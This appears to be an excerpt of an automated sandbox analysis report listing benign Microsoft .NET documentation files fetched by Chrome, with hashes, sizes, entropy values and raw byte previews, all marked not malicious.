                                                                                                                                                                                          Entropy (8bit):4.59126408969148
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                          MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                          SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                          SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                          SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/media/logos/logo_net.svg
                                                                                                                                                                                          Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):19696
                                                                                                                                                                                          Entropy (8bit):7.9898910353479335
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
                                                                                                                                                                                          MD5:4D0BFEA9EBDA0657CEE433600ED087B6
                                                                                                                                                                                          SHA1:F13C690B170D5BA6BE45DEDC576776CA79718D98
                                                                                                                                                                                          SHA-256:67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
                                                                                                                                                                                          SHA-512:9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/docons.a1ef6ef.34a85e0c.woff2
                                                                                                                                                                                          Preview:wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.*."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t*..........3..C..?u....E.S$.:.....mfZ......... .Q...].y.*.@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V..*.=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.|49.......]
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):33148
                                                                                                                                                                                          Entropy (8bit):4.917595394577667
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                          MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                          SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                          SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                          SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                                                                                                                          Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):35005
                                                                                                                                                                                          Entropy (8bit):7.980061050467981
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                          MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                          SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                          SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                          SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):13842
                                                                                                                                                                                          Entropy (8bit):7.802399161550213
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                          MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                          SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                          SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                          SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):4897
                                                                                                                                                                                          Entropy (8bit):4.8007377074457604
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                          MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                          SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                          SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                          SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):47062
                                                                                                                                                                                          Entropy (8bit):5.016115705165622
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:haAE16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTAGLlO6eAbTIr4audZqBkZRLg
                                                                                                                                                                                          MD5:B7BA0F1B4D3EE09BD4C1DD5EE8FA2633
                                                                                                                                                                                          SHA1:A5725E0BD2E4DE3EB07E9C468306615CD0CE6955
                                                                                                                                                                                          SHA-256:411BCF8F95DAF3C6D0BEBDFA4DDEFD0F947D2083C1A27BDD0E5D19BB6F299838
                                                                                                                                                                                          SHA-512:59F535B445302E8A8398F02F7729D16236C629EB0967833257F8BA391A4E93B3A23A5FA3D64127EC117B8D93A6D7A9B86EBCB4B6E6F96CFF3B4DB3EE3C5F4844
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                          Preview:<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):3130
                                                                                                                                                                                          Entropy (8bit):4.790069981348324
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                          MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                          SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                          SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                          SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
                                                                                                                                                                                          Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):18367
                                                                                                                                                                                          Entropy (8bit):7.7772261735974215
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                          MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                          SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                          SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                          SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):13339
                                                                                                                                                                                          Entropy (8bit):7.683569563478597
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                          MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                          SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                          SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                          SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):18367
                                                                                                                                                                                          Entropy (8bit):7.7772261735974215
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                          MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                          SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                          SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                          SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
                                                                                                                                                                                          Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1154
                                                                                                                                                                                          Entropy (8bit):4.59126408969148
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                          MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                          SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                          SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                          SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):3130
                                                                                                                                                                                          Entropy (8bit):4.790069981348324
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                          MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                          SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                          SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                          SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):15427
                                                                                                                                                                                          Entropy (8bit):7.784472070227724
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                          MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                          SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                          SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                          SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                          Malicious:false
